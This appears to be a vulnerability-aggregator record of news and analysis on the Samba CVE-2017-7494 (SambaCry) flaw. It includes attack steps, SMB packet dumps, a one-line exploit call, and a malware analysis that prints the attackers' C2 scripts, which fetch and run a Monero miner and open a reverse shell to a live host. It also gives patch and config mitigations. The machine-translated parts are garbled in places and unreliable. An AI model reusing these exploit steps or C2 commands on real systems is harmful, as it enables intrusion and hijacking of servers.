src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7895-67051/758-182/pastedImage_13.png\" style=\" width: 1036.11px;\" width=\"758\"/></a></p><p style=\"min-height: 8pt; padding: 0px; background: white;\">&#160;</p><p style=\"background: white;\"><span style=\"font-size: 11.5pt; font-family: 'Arial',sans-serif; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"background: white;\"><span style=\"color: black; font-weight: inherit; font-size: 11.0pt; font-family: 'Arial',sans-serif; font-style: inherit;\">Using these steps, you&#8217;ll be able to quickly scan as well as report on the Samba vulnerability. Let us know if you have any more questions!</span></p></div><!-- [DocumentBodyEnd:6c3fb3b9-ef2f-4db7-89c0-fcd508c9910a] -->", "modified": "2017-05-25T21:22:37", "published": "2017-05-25T21:22:37", "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/25/scanning-and-remediating-samba-cve-2017-7494-in-insightvm-and-nexpose", "id": "RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F", "title": "Samba CVE-2017-7494: Scanning and Remediating in InsightVM and Nexpose", "type": "rapid7community", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2017-05-25T17:49:44", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "edition": 1, "description": "Author: cyg07 &amp;&amp; redrain\n\n## Overview\n\n2017 5 May 24, Samba released a 4. 6. 4 version, in the middle fix a serious remote code execution vulnerability, the vulnerability number CVE-2017-7494, the vulnerability affects Samba 3.5.0 and including 4. 6. 4/4. 5. 10/4. 4. 14 the intermediate version. 360 Network Security Center and 360 information security portion of the Gear Team first time on the vulnerabilities were analyzed, to confirm belonging to the serious vulnerability can cause remote code execution.\n\n## Technical analysis\n\nAs the official described the vulnerability only by one can be written to the Samba user permissions can mention the right to the samba server where the root permissions on the samba default is the root user execution.\n\nFrom the Patch perspective, then, the is_known_pipename function of the pipename exists in the path of the symbol will have problems:\n\n! [](/Article/UploadPic/2017-5/2017525114112452. png)\n\nThen extend the lower smb_probe_module function will form the announcement that loaded the attacker to upload the dll to arbitrary code execution:\n\n! [](/Article/UploadPic/2017-5/2017525114112658. png)\n\nSpecific attack process:\n\n1. Construct a\u2019/\u2019 symbol pipes the name or path name, such as \u201c/home/toor/cyg07. so\u201d\n2. Via the smb Protocol the initiative to let the server smb return the FID\n3. The subsequent direct request from the FID into the above mentioned malicious processes\n\nThe specific result of the attack is as follows:\n\n1. Try to load \u201c/home/toor/cyg07. so\u201d maliciously so! [](/Article/UploadPic/2017-5/2017525114113647. png)\n2. Which the so the code is as follows(when loaded will call samba_init_module export function)! [](/Article/UploadPic/2017-5/2017525114113327. png)\n3. Finally, we can be in/tmp/360sec seen the actual execute permissions(with root permissions)! [](/Article/UploadPic/2017-5/2017525114113328. png)\n\n**[1] [[2]](<86440_2.htm>) [next](<86440_2.htm>)**\n", "modified": "2017-05-25T00:00:00", "published": "2017-05-25T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/86440.htm", "id": "MYHACK58:62201786440", "title": "Samba remote code execution vulnerability(CVE-2017-7494)analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-27T17:50:34", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "edition": 1, "description": "0x01 Intro \n2017 5 May 24, Samba official released a security Bulletin, the new release of Samba 4.6.4 fixes a serious code execution vulnerability(CVE-2017-7494), the vulnerability affects Samba 3.5.0 after to 4. 6. 4/4. 5. 10/4. 4. 14 in the middle of all versions. At rpc_server/srv_pipe. c in the presence of a verified BUG, the attacker can use the client to upload a malicious dynamic library file to have write permissions in the shared directory, after issuing the request, the server loads the Samba directory and run outside of the illegal module, resulting in malicious code execution. \nSamba is a kind of used to allow UNIX series the[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>)with the Microsoft Windows operating system of the SMB/CIFS network Protocol to do link free software. Many business or personal NAS(Network Attached Storage), routers and other IOT devices storage solutions will choose the open source software Samba to provide data access services. IPC$(Internet Process Connection) is a shared \u201cnamed pipe\u201d resources, allowing the user anonymous access to the Samba server's shared resources. \n0x02 vulnerability analysis \nBased on 360 days eye laboratory full network scan of the data show that the current Chinese mainland and Hong Kong and Macao open 445 port the IP number is 18883, wherein the Samba service Co-4433, and the Samba version of the fall in the loophole version of the interval IP number is 3765, accounted for Samba service 85% from! Taiwan, Hong Kong, respectively, to 1767, in 1853, the remaining provinces of the distribution as shown below. \n! [](/Article/UploadPic/2017-5/201752805553863. png? www. myhack58. com) \n0x03 vulnerability validation and analysis \nEnvironment preparation: \n! [](/Article/UploadPic/2017-5/201752805553685. png? www. myhack58. com) \nUsing the Metasploit open the exploits module(is_known_pipename)for testing. Download: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb \nAttack process: \n1\\. To have write access to the Samba server share directory to upload malicious dynamic library, here named evil. so; \n2\\. The attacker violence guess the shared directory absolute path, while to the IPC$(a named pipe)resources request step 1 Upload a malicious dynamic library, the file name changes on the server the absolute path\u201d /path/to/evil. so\u201d; \n3\\. Server Error the resource file \u201d /path/to/evil. so\u201d as the IPC$(a named pipe)resource loading operation, the vulnerability is triggered. \n1\uff09Upload a malicious dynamic library files to the server shared directory public \n! [](/Article/UploadPic/2017-5/201752805553640. png? www. myhack58. com) \nArticle 51 a packet Write AndX Request write request data, as shown below: \nSMB (Server Message Block Protocol) \nSMB Header \nServer Component: SMB \n[Response in: 52] \nSMB Command: Write AndX (0x2f) \nError Class: Success (0x00) \n... \nTree ID: 51295 (\\\\\\192.168.119.155\\public) #to access the drone of the shared file path of the Tree ID \nProcess ID: 51988 \nUser ID: 62509 \nMultiplex ID: 27235 \nWrite AndX Request (0x2f) \nWord Count (WCT): 14 \nAndXCommand: No further commands (0xff) \nReserved: 00 \nAndXOffset: 0 \nFID: 0xef37 (\\rDfDKbgV. so) # malicious dynamic library file FID \n... \n[File RW Length: 476] #write the file size \nByte Count (BCC): 476 \nData (476 bytes) #upload binary data \nData: 7f454c4602010100000000000000000003003e0001000000... \n[Length: 476] \n2 to a named pipe request malicious dynamic library \n! [](/Article/UploadPic/2017-5/201752805553810. png? www. myhack58. com) \nThe first 59 a packet NT Create AndX request request named pipe resource data, as follows: \nSMB (Server Message Block Protocol) \nSMB Header \nServer Component: SMB \nSMB Command: NT Create AndX (0xa2) \n... \nTree ID: 19967 (\\\\\\192.168.119.155\\IPC$) #here use the Named Pipes mode is very important \nProcess ID: 51988 \nUser ID: 62509 \nMultiplex ID: 27235 \nNT Create AndX Request (0xa2) \nWord Count (WCT): 24 \nAndXCommand: No further commands (0xff) \nReserved: 00 \nAndXOffset: 0 \nReserved: 00 \n\n\n**[1] [[2]](<86521_2.htm>) [next](<86521_2.htm>)**\n", "modified": "2017-05-28T00:00:00", "published": "2017-05-28T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/86521.htm", "id": "MYHACK58:62201786521", "title": "Samba remote code execution vulnerability(CVE-2017-7494)-SambaCry analysis report-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-06-13T16:18:34", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "edition": 1, "description": "\u201c2017 5 May 24, Samba released a 4. 6. 4 version, in the middle fix a serious remote code execution vulnerability, the vulnerability number CVE-2017-7494, the vulnerability affects Samba 3.5.0 after to 4. 6. 4/4. 5. 10/4. 4. 14 in the middle of all versions.\n\nSambaCry vulnerability is a scale spread of the worm nature of the vulnerability, the recent Kaspersky Security lab by the honeypot to capture a SambaCry vulnerability to malicious use bot to block even the digital currency bitcoin mining of the attack.\n\nExploit \nBecause the vulnerability requires the smb shared drive letter has to be written permission from the Kaspersky Lab honeypot to capture the attack packets point of view, the attacker first the server attempts to write to a random character name of the file, after the success of the deletion. \n! [](/Article/UploadPic/2017-6/201761320335502. png? www. myhack58. com) \nIn the detection of the successful have write permissions, the attacker violence guess write the file's full path to get the shared directory path, and write a malicious lib as a payload in. \n! [](/Article/UploadPic/2017-6/201761320335906. png? www. myhack58. com) \nIn blasting to the correct path, then use CVE-2017-7494 vulnerability to load a malicious lib execute the command, because the samba default is root permissions to start, so after loading the lib command executed with root permissions, execute, and successfully exploited, then delete write the lib, only in memory to perform malicious command operation. \nMalicious lib sample 349d84b3b176bbc9834230351ef3bc2a_16106. so(INAebsGB. so)and 2009af3fed2a4704c224694dfc4b31dc_30361. so(cblRWuoCc. so) \nSample analysis \nIn INAebsGB. so, the attacker with/bin/sh to perform a very simple rally a shell operation, so execute the downloaded file or execute subsequent commands. \n! [](/Article/UploadPic/2017-6/201761320335566. png? www. myhack58. com) \nFound this lib is actually metasploit is_known_pipename module generated. \nThereafter, the write another libcblRWuoCc. so, in this lib, the attacker, bounce the shell to the C2 Server 4000 port and download a mining program, the bot as the CPU miner to use with this sample, we positioned the C2 server and the mining program. \n! [](/Article/UploadPic/2017-6/201761320335500. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-6/201761320335277. png? www. myhack58. com) \nTo perform acts of: \n\nbash-i \nAttacker Download http://rc. ezreal. space/minerd64_s and stored in/tmp/m to give permission after the nohup execution. \nSimple to the C2 Server query as follows: \nrc. ezreal. space \nA record 149.255.35.33 \nTime IP country Province / the state operator \n2017-05-17 149.255.35.33 Illinois, USA swiftway.net \n2017-05-15 149.255.35.33 Illinois, USA swiftway.net \n2017-04-30 185.86.150.76 Sweden Ciotat Poland \nwww.ezreal.space 191.101.31.100 \ncl. ezreal. space 191.101.31.100 \nrc2. ezreal. space 149.255.35.77 \nrc. ezreal. space 149.255.35.33 \ntypo hacker? \nIn my connection C2 the server rc. ezreal. space4000 port, see the following script: \n#!/ usr/bin/env bash \nhost='149.255.35.33'; \nnohup bash-i \nnohuo bash-i \nnohuo bash-i \nAttacker the Want nohup to ignore the system hang up for running in the background, but do not know if the careless hand shake the reason, nohup play into nohuo \nTo access the other three ports, give it a few script: \n\u279c /tmp nc 149.255.35.33 4001 \n#!/ usr/bin/env bash \n#minerd script \nhost='149.255.35.33'; \ntarget=$RANDOM; target+=. so; target=/tmp/$target; \ncat $target &amp;&amp; chmod +x $target &amp;&amp; nohup $target &amp; \n\u279c /tmp nc 149.255.35.33 4002 \n#!/ usr/bin/env bash \n# process guard script \n\u279c /tmp nc 149.255.35.33 4003 \n#!/ usr/bin/env bash \n# auto start script% \nC2 port 5000 to get to the miner program and from http in download get consistent \nminer analysis \nUntil now, the C2 server is still survival, download minerd64_s and simple analysis, found that is a common CPU mining program miderd but the attacker did not like the common additional parameters, but all parameters are hard-coded into the program puts the need to perform parameters. \n! [](/Article/UploadPic/2017-6/201761320335961. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-6/201761320335667. png? www. myhack58. com) \nHere soon found the attacker's mining pool and wallet address: \n. rodata:0000000000515604 00000026 C stratum+tcp://xmr. crypto-pool. fr:3333 \n. rodata:00000000005156CC 00000060 C 43xtViRHn1oibjS6yZSgS6XhFFkSRGC5shgmymh6ei4r5osjprc1z85beczs89ztl4idgdouheoktcve115wp7sb6xzhmgy \nBy mining pool Transaction query, that the attacker-dug is a cottage currency\u2019XDN\u2019and\u2019XMR\u2019, view recent into the case, found that the earnings also nice:) \nAnother attack \nThe thought that at this point our analysis and the Kaspersky difference not ready to come home from work, but found 360 tracking team also provides a sample of the 1bb17e0d03ebd5acafbe60b70e38dec4. so(oooo. so) \nThe lib and cblRWuoCc. so very similar, but the execution of the operation is not the same \n! [](/Article/UploadPic/2017-6/201761320335339. png? www. myhack58. com)\n\n**[1] [[2]](<86995_2.htm>) [next](<86995_2.htm>)**\n", "modified": "2017-06-13T00:00:00", "published": "2017-06-13T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/86995.htm", "id": "MYHACK58:62201786995", "title": "SambaCry exploit analysis-exploit warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-25T17:49:48", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "edition": 1, "description": "Samba is a Linux and UNIX system of the SMB Protocol service software, can be achieved with other[operating system](<http://www.myhack58.com/Article/48/Article_048_1.htm>) such as: Microsoft Windows operating system, file system, printers and other shared resources. The vulnerability of the earliest influence to the 7 ago version, a hacker can exploit the vulnerability for remote code execution. \nVulnerability number \nCVE-2017-7494 \nImpact version \nSamba 3.5. 0 to 4. 6. 4/4. 5. 10/4. 4. 14 the intermediate version \nVulnerability description \nAn attacker could exploit the vulnerability remote code execution, specifically the execution conditions are as follows: \n1\\. The server opens the file/Printer Sharing port 445, so it can be in public access \n2\\. Sharing files has write permissions \n3\\. A malicious attacker need to guess the Samba service end of the shared directory's physical path \nMeet the above conditions, since Samba can be selected for the directory to create a network share, when a malicious client connected to a writable shared directory, by uploading a malicious link library file, so that the service terminal program to load and execute it, in order to achieve remote code execution. According to the server, the attacker also possible to root the identity of the execution. \nVulnerability \nThe Samba vulnerability is reminiscent of the stage before sweeping the world of WannaCry vulnerability, the researchers suspect that the vulnerability having the same propagation characteristics. \nIn WannaCry the use of the vulnerability has just appeared, many people think that it does not cause a great impact, because most people don't put file/Printer Sharing ports open to the public, but after holding this idea of people being quickly hit the face, WannaCry virus caused harm beyond everyone's imagination. \nAnd according to Phobus security company's founder, Dan Tentler said that there are 477,000 for the installation of a Samba computer exposed to the 445 port, although we don't know how many runs you can attack the Samba version. Tentler refers to Shodan search results returned. Rapid7 researchers also made statistics, they detected a 110,000 computers running the official no longer provide support for the Samba version, that is not there for these versions of the patch. Therefore, the Samba vulnerability can be caused by the impact can be imagined. \n! [](/Article/UploadPic/2017-5/2017525224351726. jpg? www. myhack58. com) \nBut the Windows are different, the Samba of the SMB function the default is not open, you must manually open. \nOne possible attack scenario is that the hackers first attack in the home network NAS, because NAS is more likely to be the file sharing ports exposed to the public network, then hack further to attack LAN. \nTrojan \nmsf has added a specialized module, you can use this msf module for testing. \n! [](/Article/UploadPic/2017-5/2017525224351595. jpg? www. myhack58. com) \nBug fixes \nThe most secure method or patch or upgrade to Samba 4.6.4/4.5.10/4.4.14 any version, you can refer to here. \nIf temporarily unable to upgrade the version or install the patch, you can use temporary solution: \nIn the smb. conf the[global]section add the parameter: \nnt pipe support = no \nThen restart the smbd service. \n\n", "modified": "2017-05-25T00:00:00", "published": "2017-05-25T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/86477.htm", "id": "MYHACK58:62201786477", "title": "Vulnerability warning|Samba remote code execution vulnerability, affecting 7 years ago version-bug warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-01-27T09:17:41", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "[](<https://2.bp.blogspot.com/-cKxsm9AhNKw/WXnPEYvxJDI/AAAAAAAAtz0/eoTwaojg7o8EzznO9dSVXmIfWyr5YtCpwCLcBGAs/s1600/windows-malware-cryptocurrency-miner.png>)\n\nLast month, we reported about a group of hackers exploiting [**SambaCry**](<https://thehackernews.com/2017/05/samba-rce-exploit.html>)\u2014a 7-year-old critical remote code execution vulnerability in Samba networking software\u2014to [hack Linux computers](<https://thehackernews.com/2017/06/linux-samba-vulnerability.html>) and install malware to mine cryptocurrencies. \n \nThe same group of hackers is now targeting Windows machines with a new backdoor, which is a QT-based re-compiled version of the same malware used to target Linux. \n \nDubbed **CowerSnail**, [detected](<https://securelist.com/cowersnail-from-the-creators-of-sambacry/79087/>) by security researchers at Kaspersky Labs as Backdoor.Win32.CowerSnail, is a fully-featured windows backdoor that allows its creators to remotely execute any commands on the infected systems. \n \nWondering how these two separate campaigns are connected? \n \nInterestingly, the CowerSnail backdoor uses the same command and control (C&amp;C) server as the malware that was used to infect Linux machines to mine cryptocurrency last month by exploiting the then-recently exposed SambaCry vulnerability. \n\n\n> Common C&amp;C Server Location \u2014 cl.ezreal.space:20480\n\n[SambaCry vulnerability](<https://thehackernews.com/2017/05/samba-rce-exploit.html>) (CVE-2017-7494), named due to its similarities to the Windows SMB flaw exploited by the [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) that recently wreaked havoc worldwide, affected all Samba versions newer than Samba 3.5.0 released over the past seven years. \n \nShortly after the public revelation of its existence, SambaCry was exploited by this group of hackers to remotely install cryptocurrency mining software\u2014\"**CPUminer**\" that mines cryptocurrencies like Bitcoin, Litecoin, Monero and others\u2014on Linux systems. \n \nBut now, the same hackers are targeting both, Windows and Linux computers, with CPUminer by utilising computing resources of the compromised systems in order to make the profit. \n\n\n> \"After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future,\" Sergey Yunakovsky of Kaspersky Lab said in a blog post.\n\nIn separate research, security researcher Omri Ben Bassat\u200f [reported](<http://www.intezer.com/eternalminer-copycats/>) about more copycat groups of hackers who are exploiting the same SambaCry vulnerability for cryptocurrency mining and installing \"**[Tsunami backdoor](<https://thehackernews.com/2016/02/linux-mint-hack.html>)**,\" an IRC-based DDoS botnet malware that's been known for infecting Mac OS X and IoT devices in the past. \n \nFor those unaware: Samba is open-source software (re-implementation of SMB/CIFS networking protocol) that offers Linux/Unix servers with Windows-based file and print services and runs on the majority of operating systems and IoT devices. \n \nDespite being patched in late May, the SambaCry bug is actively being exploited by hackers. Just last week, researchers spotted a new piece of malware, called **[SHELLBIND](<https://thehackernews.com/2017/07/linux-malware-sambacry.html>)**, exploiting the flaw to backdoor Network Attached Storage (NAS) devices.\n", "modified": "2017-07-27T11:40:12", "published": "2017-07-27T00:40:00", "id": "THN:B1F7A116FFB321FFB433B2511F0594AA", "href": "https://thehackernews.com/2017/07/cowersnail-windows-backdoor.html", "type": "thn", "title": "CowerSnail \u2014 Windows Backdoor from the Creators of SambaCry Linux Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:40", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "[](<https://2.bp.blogspot.com/-IfU802XsX6s/WSaDGq07jCI/AAAAAAAAs1w/qr8caqavXxccixsBzn9XPPsIm27uRro4QCLcB/s1600/samba-remote-code-exploit.png>)\n\nA 7-year-old critical remote code execution vulnerability has been discovered in **Samba networking software** that could allow a remote attacker to take control of an affected Linux and Unix machines. \n \nSamba is open-source software (re-implementation of SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and OpenVMS. \n \nSamba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network shared folders, files, and printers with Windows operating system. \n \nThe newly discovered remote code execution vulnerability ([CVE-2017-7494](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7494>)) affects all versions newer than Samba 3.5.0 that was released on March 1, 2010. \n\n\n> \"All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it,\" Samba wrote in an [advisory](<https://www.samba.org/samba/security/CVE-2017-7494.html>) published Wednesday.\n\n \n\n\n### Linux version of EternalBlue Exploit?\n\n[](<https://4.bp.blogspot.com/-fOULxArzmZQ/WSZ8ob6G6eI/AAAAAAAAs1Y/O2gCnLtxcn8gnrWw_E3OrHdtGy4kXSECQCLcB/s1600/samba-remote-exploit-shodan.png>)\n\nAccording to the Shodan computer search engine, more than 485,000 Samba-enabled computers exposed port 445 on the Internet, and according to researchers at [Rapid7](<https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life>), more than 104,000 internet-exposed endpoints appeared to be running vulnerable versions of Samba, out of which 92,000 are running unsupported versions of Samba. \n \nSince Samba is the SMB protocol implemented on Linux and UNIX systems, so some experts are saying it is \"Linux version of [EternalBlue](<https://thehackernews.com/2017/04/window-zero-day-patch.html>),\" used by the [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>). \n \n...or should I say **SambaCry**? \n \nKeeping in mind the number of vulnerable systems and ease of exploiting this vulnerability, the Samba flaw could be exploited at large scale with wormable capabilities. \n \nHome networks with network-attached storage (NAS) devices could also be vulnerable to this flaw. \n \n\n\n### Exploit Code Released! (Bonus: Metasploit Module)\n\n[](<https://3.bp.blogspot.com/-VOFDRP0g7k0/WSaAdUiIGoI/AAAAAAAAs1k/L4i76X065h0DC26g_2Fj1BmS3-S9X65UQCLcB/s1600/metasploit-samba.png>)\n\nThe flaw actually resided in the way Samba handled shared libraries. A remote attacker could use this Samba arbitrary module loading vulnerability ([POC code](<https://github.com/omri9741/cve-2017-7494>)) to upload a shared library to a writable share and then cause the server to load and execute malicious code. \n \nThe vulnerability is hell easy to exploit. Just one line of code is required to execute malicious code on the affected system. \n\n\n> **simple.create_pipe(\"/path/to/target.so\")**\n\nHowever, the Samba exploit has already been ported to [Metasploit](<https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb>), a penetration testing framework, enabling researchers as well as hackers to exploit this flaw easily. \n \n\n\n### Patch and Mitigations\n\n \nThe maintainers of Samba has [already patched the issue](<https://www.samba.org/samba/history/security.html>) in their new versions **Samba versions 4.6.4/4.5.10/4.4.14**, and are urging those using a vulnerable version of Samba to install the patch as soon as possible. \n \nBut if you can not upgrade to the latest versions of Samba immediately, you can work around the vulnerability by adding the following line to your Samba configuration file smb.conf: \n\n\n> **nt pipe support = no**\n\nOnce added, restart the network's SMB daemon (smbd) and you are done. This change will prevent clients from fully accessing some network machines, as well as disable some expected functions for connected Windows systems. \n \nWhile Linux distribution vendors, including Red Hat and Ubuntu, have already released patched versions for its users, the larger risk is that from NAS device consumers that might not be updated as quickly. \n \nCraig Williams of Cisco said that given the fact that most NAS devices run Samba and have very valuable data, the vulnerability \"has potential to be the first large-scale Linux ransomware worm.\" \n \n**Update:** Samba maintainers have also [provided patches](<https://www.samba.org/samba/patches/>) for older and unsupported versions of Samba. \n \nMeanwhile, Netgear released a [security advisory](<https://kb.netgear.com/000038779/Security-Advisory-for-CVE-2017-7494-Samba-Remote-Code-Execution>) for CVE-2017-7494, saying a large number of its routers and NAS product models are affected by the flaw because they use Samba version 3.5.0 or later. \n \nHowever, the company currently released firmware fixes for only [ReadyNAS products running OS 6.x](<https://kb.netgear.com/26212/ReadyNAS-OS-6-Updating-Firmware>).\n", "modified": "2017-05-26T10:15:22", "published": "2017-05-24T20:23:00", "id": "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "href": "https://thehackernews.com/2017/05/samba-rce-exploit.html", "type": "thn", "title": "7-Year-Old Samba Flaw Lets Hackers Access Thousands of Linux PCs Remotely", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:07:01", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "[](<https://3.bp.blogspot.com/-BS9ZI7RQY4Y/WTvi9z0BxrI/AAAAAAAAtFw/fKf-wYHTtU4lqmxZKs3f_lVdHKd3N4WjACLcB/s1600/samba-linux-server.png>)\n\nRemember [SambaCry](<https://thehackernews.com/2017/05/samba-rce-exploit.html>)? \n \nTwo weeks ago we reported about a 7-year-old critical remote code execution vulnerability in Samba networking software (re-implementation of SMB networking protocol) that allows a remote hacker to take full control of a vulnerable Linux and Unix machines. \n \nTo know more about the SambaCry vulnerability (CVE-2017-7494) and how it works, you can [read our previous article](<https://thehackernews.com/2017/05/samba-rce-exploit.html>). \n \nAt that time, nearly 485,000 Samba-enabled computers were found to be exposed on the Internet, and researchers predicted that the SambaCry-based attacks also have potential to spread just like [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) widely. \n \nThe prediction came out to be quite accurate, as honeypots set up by the team of researchers from [Kaspersky Lab](<https://securelist.com/78674/sambacry-is-coming/>) have captured a malware campaign that is exploiting SambaCry vulnerability to infect Linux computers with cryptocurrency mining software. \n \nAnother security researcher, Omri Ben Bassat\u200f, independently [discovered](<https://twitter.com/omri9741/status/872731228859809793>) the same campaign and named it \"EternalMiner.\" \n \nAccording to the researchers, an unknown group of hackers has started hijacking Linux PCs just a week after the Samba flaw was disclosed publicly and installing an upgraded version of \"CPUminer,\" a cryptocurrency mining software that mines \"**Monero**\" digital currency. \n \nAfter compromising the vulnerable machines using SambaCry vulnerability, attackers execute two payloads on the targeted systems: \n\n\n * INAebsGB.so \u2014 A reverse-shell that provides remote access to the attackers.\n * cblRWuoCc.so \u2014 A backdoor that includes cryptocurrency mining utilities \u2013 CPUminer.\n\n> \"Through the reverse-shell left in the system, the attackers can change the configuration of a miner already running or infect the victim\u2019s computer with other types of malware,\" Kaspersky researchers say.\n\nMining cryptocurrencies can be a costly investment as it requires an enormous amount of computing power, but such cryptocurrency-mining malware makes it easier for cybercriminals by allowing them to utilise computing resources of compromised systems to make the profit. \n \nIf you have been following The Hacker News regularly, you must be aware of [Adylkuzz](<https://thehackernews.com/2017/05/smb-exploit-cryptocurrency-mining.html>), a cryptocurrency-mining malware that was using Windows SMB vulnerability at least two weeks before the outbreak of WannaCry ransomware attacks. \n \nThe [Adylkuzz malware](<https://thehackernews.com/2017/05/smb-exploit-cryptocurrency-mining.html>) was also mining Monero by utilizing the enormous amount of computing resources of the compromised Windows systems. \n\n\n[](<https://2.bp.blogspot.com/-En5hfAHlL_o/WTveCH6ckLI/AAAAAAAAtFg/eN2SE5B1gSogSwIJoldwzzV8yBPTtwq6wCLcB/s1600/Monero-mining-software.png>)\n\n \nThe attackers behind SambaCry-based CPUminer attack have already earned 98 XMR, which worth 5,380 today and this figure is continuously rising with the increase in the number of compromised Linux systems. \n\n\n> \"During the first day they gained about 1 XMR (about $55 according to the currency exchange rate for 08.06.2017), but during the last week they gained about 5 XMR per day,\" the researchers say.\n\nThe maintainers of Samba has already [patched the issue](<https://www.samba.org/samba/history/security.html>) in their new Samba versions 4.6.4/4.5.10/4.4.14, and are urging those using a vulnerable version of Samba to install the patch as soon as possible.\n", "modified": "2017-06-10T12:16:41", "published": "2017-06-10T01:16:00", "id": "THN:4706A097E7EBD85B2426246B35CDC5E6", "href": "https://thehackernews.com/2017/06/linux-samba-vulnerability.html", "type": "thn", "title": "Warning! Hackers Started Using \"SambaCry Flaw\" to Hack Linux Systems", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "[](<https://4.bp.blogspot.com/-W7qON8E4XPQ/WW8UKkBfj5I/AAAAAAAAtrA/yX6XHNoym1oYwi3gPXyGvn0oBkjSFM5NwCLcBGAs/s1600/sambacry-backdoor-nas-devices.png>)\n\nRemember **[SambaCry](<https://thehackernews.com/2017/05/samba-rce-exploit.html>)**? \n \nAlmost two months ago, we reported about a 7-year-old critical remote code execution vulnerability in Samba networking software, allowing a hacker to remotely take full control of a vulnerable Linux and Unix machines. \n \nWe dubbed the vulnerability as SambaCry, because of its similarities to the [Windows SMB vulnerability](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) exploited by the [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) that wreaked havoc across the world over two months ago. \n \nDespite being [patched](<https://www.samba.org/samba/security/CVE-2017-7494.html>) in late May, the vulnerability is currently being leveraged by a new piece of malware to target the Internet of Things (IoT) devices, particularly Network Attached Storage (NAS) appliances, researchers at Trend Micro [warned](<http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry/>). \n \nFor those unfamiliar: Samba is open-source software (re-implementation of SMB/CIFS networking protocol), which offers Linux/Unix servers with Windows-based file and print services and runs on the majority of operating systems, including Linux, UNIX, IBM System 390, and OpenVMS. \n \nShortly after the public revelation of its existence, the SambaCry vulnerability (CVE-2017-7494) was exploited mostly to install [cryptocurrency mining software](<https://thehackernews.com/2017/06/linux-samba-vulnerability.html>)\u2014\"CPUminer\" that mines \"[Monero](<https://thehackernews.com/2017/05/cryptocurrency-mining-botnet.html>)\" digital currency\u2014on Linux systems. \n \nHowever, the latest malware campaign involving SambaCry spotted by researchers at Trend Micro in July mostly targets NAS devices used by small and medium-size businesses. \n \n\n\n### SHELLBIND Malware Exploits SambaCry to Targets NAS Devices\n\n \nDubbed **SHELLBIND**, the malware works on various architectures, including MIPS, ARM and PowerPC, and is delivered as a shared object (.SO) file to Samba public folders and loaded via the SambaCry vulnerability. \n \nOnce deployed on the targeted machine, the malware establishes communication with the attackers' command and control (C&amp;C) server located in East Africa, and modifies firewall rules to ensure that it can communicate with its server. \n \nAfter successfully establishing a connection, the malware grants the attackers access to the infected device and provides them with an open command shell in the device, so that they can issue any number and type of system commands and eventually take control of the device. \n \nIn order to find the affected devices that use Samba, attackers can leverage the Shodan search engine and write the original malware files to their public folders. \n\n\n> \"It is quite easy to find devices that use Samba in Shodan: searching for port 445 with a 'samba' string will turn up a viable IP list,\" researchers said while explaining the flaw. \n\n> \"An attacker would then simply need to create a tool that can automatically write malicious files to every IP address on the list. Once they write the files into the public folders, the devices with the SambaCry vulnerability could become ELF_SHELLBIND.A 